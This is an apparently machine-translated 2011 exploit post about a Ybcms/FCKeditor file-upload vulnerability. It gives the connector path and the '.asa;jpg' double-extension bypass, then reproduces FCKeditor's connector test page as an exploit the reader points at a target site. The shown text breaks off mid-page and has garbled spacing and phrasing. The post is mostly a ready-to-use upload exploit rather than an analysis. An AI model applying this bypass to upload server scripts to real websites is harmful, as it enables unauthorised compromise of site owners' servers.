Ybcms pass to kill 0day and fix-vulnerability warning-the black bar safety net

2011-11-01T00:00:00
ID MYHACK58:62201132220
Type myhack58
Reporter 佚名
Modified 2011-11-01T00:00:00

Description

Author:hackdn

Baidu not search to, shoving hair it.

FCKEDITOR upload vulnerability: fck/editor/filemanager/connectors/test.html

Uploaded. asa;jpg

There is no TEST. HTML, save the following EXP. Yourself fill the Internet address

<!--

  • FCKeditor - The text editor for Internet - http://www.fckeditor.net

  • Copyright (C) 2003-2007 Frederico Caldeira Knabben

*

  • == BEGIN LICENSE ==

*

  • Licensed under the terms of any of the following licenses at your

  • choice:

*

    • GNU General Public License Version 2 or later (the "GPL")
  • http://www.gnu.org/licenses/gpl.html

*

    • The GNU Lesser General Public License Version 2.1 or later (the "LGPL")
  • http://www.gnu.org/licenses/lgpl.html

*

    • Mozilla Public License Version 1.1 or later (the "MPL")
  • http://www.mozilla.org/MPL/MPL-1.1.html

*

  • == END LICENSE ==

*

  • Test page for the File Browser connectors.

-->

<! DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<title>FCKeditor - Connectors Tests</title>

<script type="text/javascript">

function BuildBaseUrl( command )

{

var sUrl =

document. getElementById('cmbConnector'). value +

'? Command=' + command +

'&Type=' + document. getElementById('cmbType'). value +

'&CurrentFolder=' + encodeURIComponent(document. getElementById('txtFolder'). value) ;

return sUrl ;

}

function SetFrameUrl( url )

{

document. getElementById('eRunningFrame'). src = url ;

document. getElementById('eUrl'). innerHTML = url ;

}

function GetFolders()

{

SetFrameUrl( BuildBaseUrl( 'GetFolders' ) ) ;

return false ;

}

function GetFoldersAndFiles()

{

SetFrameUrl( BuildBaseUrl( 'GetFoldersAndFiles' ) ) ;

return false ;

}

function CreateFolder()

{

var sFolder = prompt( 'Type the folder name:', 'Test Folder' ) ;

if ( ! sFolder )

return false ;

var sUrl = BuildBaseUrl( 'CreateFolder' ) ;

sUrl += '&NewFolderName=' + encodeURIComponent( sFolder ) ;

SetFrameUrl( sUrl ) ;

return false ;

}

function OnUploadCompleted( errorNumber, fileName )

{

switch ( errorNumber )

{

case 0 :

alert( 'File uploaded with no errors' ) ;

break ;

case 2 0 1 :

GetFoldersAndFiles() ;

alert( 'A file with the same name is already available. The uploaded file has been renamed to "' + fileName + '"' ) ;

break ;

case 2 0 2 :

alert( 'Invalid file' ) ;

break ;

default :

alert( 'Error on file upload. Error number: '+ errorNumber ) ;

break ;

}

}

this. frames. frmUpload = this ;

function SetAction()

{

var sUrl = BuildBaseUrl( 'FileUpload' ) ;

document. getElementById('eUrl'). innerHTML = sUrl ;

document. getElementById('frmUpload'). action = sUrl ;

}

</script>

</head>

<body>

<table height="1 0 0%" cellspacing="0" cellpadding="0" width="1 0 0%" border="0">

[1] [2] next